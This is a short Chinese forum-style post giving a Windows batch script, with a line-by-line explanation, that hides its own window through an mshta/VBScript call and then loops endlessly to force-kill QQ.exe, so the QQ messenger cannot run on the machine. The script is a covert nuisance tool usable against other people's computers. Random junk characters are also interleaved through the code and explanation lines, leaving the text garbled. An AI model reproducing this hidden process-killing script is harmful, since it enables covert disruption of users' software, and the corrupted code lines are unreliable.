|
功能:运行以后机器上的QQ就不能运行了。终结方法是:打开任务管理器,然后结束进程cmd.exe就可以了。
' x1 a& w3 R) o5 Y新建文本文档,然后将下面代码复制进去,然后重命名为a.bat,然后双击就可以了。
@; B% ~3 Y- m& R- O
: a) b( ~% a6 @) [3 D1 l! o@echo off 5 I1 `/ ~1 P. \/ ~% [/ R' U
if "%1" == "h" goto begin
6 X( m/ o3 D8 h4 U* Lmshta vbscript:createobject("wscript.shell").run("%~nx0 h",0)(window.close)&&exit
1 q& U" k2 @7 S:begin 8 w3 j w( p( ^" s0 ]* Q
tasklist |find /i "QQ.exe"
4 ^& l1 \9 b" \% Zif %errorlevel%==0 (goto killit) else (goto next) 8 j8 J X' g! r5 f6 ]7 e3 j
:killit
' x6 ^/ {/ W0 ]taskkill /f /im QQ.exe % I# j6 z. `7 a; V$ J2 R, {
:next
$ M3 ~( g& u' b6 Lping -n 3 127.t >nul 2>nul
8 Y a5 j& H- C& i% i- K0 x+ ogoto begin 0 z/ m, h1 b/ A% X1 {
+ F7 y1 L j, x+ X9 l代码到此为止 . H) s* k/ R, d1 j& L
讲解如下: . m0 u; o2 P3 @
@echo off ------关闭回显 ) c) O3 n2 Z" c3 A" U0 Y
if "%1" == "h" goto begin --如果文件运行时有参数h,则显示窗口运行,否则只是在后台运行
8 q6 p( }- M4 |1 \- Nmshta vbscript:createobject("wscript.shell").run("%~nx0 h",0)(window.close)&&exit -----隐藏窗口代码
# d1 J* T+ } f2 Y:begin ------------定一段名begin 3 V. F4 o" s& m; M0 q8 a/ _/ A
tasklist |find /i "QQ.exe" ----在任务管理器里寻找进程QQ.exe 6 p. |: r T3 d2 p9 x4 G$ g: D' ^! k
if %errorlevel%==0 (goto killit) else (goto next)---如果存在QQ.exe.则跳转执行killit,否则执行next
* ^- n3 I8 z' f7 I) d, @:killit
) D+ ]! y- h9 f( H" Ctaskkill /f /im QQ.exe----终结进程QQ.exe 8 |8 k- X3 o0 C. Y
:next 6 ^, ?+ f0 q! e$ s8 ~
ping -n 3 127.t >nul 2>nul -----延迟一段时间
9 k! b) V5 Y9 ^. U4 fgoto begin--------------返回执行begin
! J' {, |# U& k |
|